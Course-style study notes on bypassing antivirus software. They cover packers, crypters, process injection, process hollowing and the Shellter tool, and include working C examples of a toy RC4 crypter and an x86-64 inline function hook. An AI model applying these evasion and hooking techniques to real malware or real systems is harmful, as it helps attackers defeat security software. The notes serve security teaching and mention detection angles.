Antivirus Evasion
Bypass Antivirus Software
Methods of Detecting Malicious Code
Bypassing Antivirus Detection
On-Disk Evasion
-
Packers
Produce a smaller, functionally equivalent executable with a completely new binary structure.
Result: a new file hash and byte layout, so signatures written for the original binary no longer match.
-
Obfuscators
Replace instructions with semantically equivalent ones, insert irrelevant instructions and dead code, and split and reorder functions. The program behaves the same, but the byte patterns a signature was written against are gone.
-
Crypters
Encrypt the executable code and prepend a decryption stub that restores the original code when the file runs. Decryption happens in memory, so only the encrypted payload and the stub ever sit on disk. Caveat: the stub itself is plaintext and, if reused unchanged across builds, becomes the new signature; a memory scanner can still catch the decrypted code once it is running.
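To make the on-disk versus in-memory distinction concrete, here is an added example that is not part of the original notes: a toy crypter and a toy byte-pattern scanner in C. The payload bytes, the marker the scanner looks for, and the choice of RC4 as the cipher are this example's own assumptions, picked for brevity; nothing here is real shellcode or a real AV engine.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define KEY_LEN 16
#define MAX_PAYLOAD 256

/* Constructed stand-in payload: the marker string is what our toy scanner
 * "signatures". Not real shellcode. */
static const uint8_t PAYLOAD[] = "\x90\x90\xcc" "MALICIOUS_PATTERN_TO_DETECT" "\xcc";
static const uint8_t SIGNATURE[] = "MALICIOUS_PATTERN_TO_DETECT";
#define PAYLOAD_LEN (sizeof(PAYLOAD) - 1)   /* drop the literal's NUL */
#define SIG_LEN (sizeof(SIGNATURE) - 1)

typedef struct {
    uint8_t key[KEY_LEN];       /* embedded key, as a real stub carries it */
    uint8_t body[MAX_PAYLOAD];  /* ciphertext */
    size_t body_len;
} artifact_t;

/* RC4 (encrypt and decrypt are the same operation). Weak by today's
 * standards, but the classic crypter cipher and short enough to read. */
static void rc4(const uint8_t *key, size_t klen, uint8_t *buf, size_t len) {
    uint8_t S[256];
    for (int i = 0; i < 256; i++) S[i] = (uint8_t)i;
    for (int i = 0, j = 0; i < 256; i++) {
        j = (j + S[i] + key[i % klen]) & 0xff;
        uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
    }
    for (size_t n = 0, i = 0, j = 0; n < len; n++) {
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
        buf[n] ^= S[(S[i] + S[j]) & 0xff];
    }
}

/* Toy static scanner: is the signature present as a contiguous byte run? */
static int scan(const uint8_t *buf, size_t len, const uint8_t *sig, size_t slen) {
    if (slen == 0 || len < slen) return 0;
    for (size_t i = 0; i + slen <= len; i++)
        if (memcmp(buf + i, sig, slen) == 0) return 1;
    return 0;
}

/* "Crypt" step, run once at build time: produce the on-disk artifact. */
static int build_artifact(artifact_t *out, const uint8_t key[KEY_LEN],
                          const uint8_t *payload, size_t plen) {
    if (plen > MAX_PAYLOAD) return -1;
    memcpy(out->key, key, KEY_LEN);
    memcpy(out->body, payload, plen);
    out->body_len = plen;
    rc4(out->key, KEY_LEN, out->body, plen);   /* encrypt in place */
    return 0;
}

/* "Stub" step, run at load time: decrypt into memory only. The artifact is
 * left untouched, so the bytes on disk never contain the plaintext. */
static size_t stub_decrypt(const artifact_t *art, uint8_t *mem, size_t mem_len) {
    if (art->body_len > mem_len) return 0;
    memcpy(mem, art->body, art->body_len);
    rc4(art->key, KEY_LEN, mem, art->body_len);
    return art->body_len;
}

int main(void) {
    const uint8_t key[KEY_LEN] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16}; /* constructed */
    artifact_t art;
    uint8_t mem[MAX_PAYLOAD];
    build_artifact(&art, key, PAYLOAD, PAYLOAD_LEN);
    printf("plaintext on disk? %d\n", scan(PAYLOAD, PAYLOAD_LEN, SIGNATURE, SIG_LEN));
    printf("artifact on disk?  %d\n", scan(art.body, art.body_len, SIGNATURE, SIG_LEN));
    size_t n = stub_decrypt(&art, mem, sizeof mem);
    printf("decrypted memory?  %d\n", scan(mem, n, SIGNATURE, SIG_LEN));
    return 0;
}
```

The scanner never finds the marker in the artifact because only ciphertext is written to it; after the stub runs, the same scanner matches the decrypted buffer, which is exactly what a memory scanner does. Building twice with different keys yields different artifact bodies (the "new signature" effect), while the fixed artifact layout and stub code are what a vendor would signature next.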
-
Software Protectors
In-Memory Evasion
Never writes the payload to disk; the malicious code exists only inside the memory of a running process, so on-disk scanning has nothing to inspect. Memory scanning and behavioural detection still apply.
Remote Process Memory Injection
Open a handle to a legitimate running process (not the malicious one), allocate a new memory region inside it with execute permission, copy the payload into that region, and start a thread there to run it. On Windows this is the OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread sequence.
Reflective DLL Injection
Process Hollowing
Launch a legitimate, non-malicious process in a suspended state (on Windows, CreateProcess with the CREATE_SUSPENDED flag).
Unmap the process's image from memory and write the malicious image in its place, then point the thread's entry point at it (SetThreadContext).
Resume the process (ResumeThread); it now executes the malicious code while still appearing to be the legitimate program.
Inline Hooking
Modify the in-memory code of a legitimate function so that execution is redirected to malicious code, typically by overwriting the first instructions of the function with a jump.
Once the malicious code has run, flow returns to the modified function and the original execution resumes, so the caller sees nothing unusual.
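The following is an added example, not from the original notes, of the inline-hooking pattern just described: a minimal entry-point hook written for x86-64 Linux with gcc or clang (on Windows the same steps use VirtualProtect and WriteProcessMemory, but this version runs without Win32). The hooked function, its caller and the result tampering are a constructed scenario; the code assumes the process is allowed to make its own text pages writable with mprotect.

```c
#if !defined(__x86_64__)
#error this example encodes an x86-64 jmp rel32 and must be built on x86-64 Linux
#endif
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define PATCH_LEN 5   /* E9 + rel32: the 5-byte relative jmp we write */

typedef int (*balance_fn)(int);

/* The legitimate function the hook sits in front of (constructed target). */
__attribute__((noinline)) static int compute_balance(int account) {
    return account * 100;
}

static uint8_t saved_prologue[PATCH_LEN];  /* original first bytes of the target */
static void *target = (void *)compute_balance;

/* Change protection on the page(s) covering [addr, addr+len). */
static int set_prot(void *addr, size_t len, int prot) {
    uintptr_t page = (uintptr_t)sysconf(_SC_PAGESIZE);
    uintptr_t start = (uintptr_t)addr & ~(page - 1);
    uintptr_t end = (uintptr_t)addr + len;
    return mprotect((void *)start, end - start, prot);
}

/* Write PATCH_LEN bytes into executable code: make the page writable, copy,
 * then drop back to read+execute. */
static int write_code(void *dst, const uint8_t *src) {
    if (set_prot(dst, PATCH_LEN, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) return -1;
    memcpy(dst, src, PATCH_LEN);
    __builtin___clear_cache((char *)dst, (char *)dst + PATCH_LEN);
    return set_prot(dst, PATCH_LEN, PROT_READ | PROT_EXEC);
}

/* Overwrite the entry of `from` with `jmp to`. The jmp is relative, so `to`
 * must lie within +/-2 GiB, which holds for code in the same image. */
static int patch_jmp(void *from, void *to) {
    intptr_t rel = (intptr_t)to - ((intptr_t)from + PATCH_LEN);
    if (rel > INT32_MAX || rel < INT32_MIN) return -1;
    int32_t rel32 = (int32_t)rel;
    uint8_t patch[PATCH_LEN] = { 0xE9 };
    memcpy(patch + 1, &rel32, sizeof rel32);
    return write_code(from, patch);
}

/* Execution arrives here through the jmp with the caller's arguments still
 * in registers. Classic pattern: unhook, run the real function, re-hook, and
 * tamper with the result before returning to the unsuspecting caller. */
__attribute__((noinline)) static int hooked_compute_balance(int account) {
    write_code(target, saved_prologue);          /* restore the original entry */
    balance_fn volatile real = compute_balance;  /* opaque call: not reordered */
    int result = real(account);                  /* original code runs here */
    patch_jmp(target, (void *)hooked_compute_balance); /* re-arm the hook */
    return result + 1000000;                     /* attacker's modification */
}

static int install_hook(void) {
    memcpy(saved_prologue, target, PATCH_LEN);
    return patch_jmp(target, (void *)hooked_compute_balance);
}

static int remove_hook(void) {
    return write_code(target, saved_prologue);
}

/* Call the target the way an unaware caller would: through a pointer the
 * compiler cannot see through, so the call really enters at the patched bytes. */
static int call_balance(int account) {
    balance_fn volatile fn = compute_balance;
    return fn(account);
}

int main(void) {
    printf("before hook:  %d\n", call_balance(5));
    if (install_hook() != 0) { perror("install_hook"); return 1; }
    printf("hooked:       %d\n", call_balance(5));
    remove_hook();
    printf("after unhook: %d\n", call_balance(5));
    return 0;
}
```

The caller never changes: it keeps calling compute_balance at the same address, and the only trace of the hook is the five overwritten bytes at the function's entry. That is also why integrity checks of loaded code (comparing the in-memory prologue against the on-disk image) are a standard way to detect this technique.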
Shellter
Dynamic shellcode injection tool: it takes a legitimate Windows PE, injects the payload into it and keeps the original program working. Arguably one of the most popular free tools for bypassing AV software.
sudo apt install shellter
sudo shellter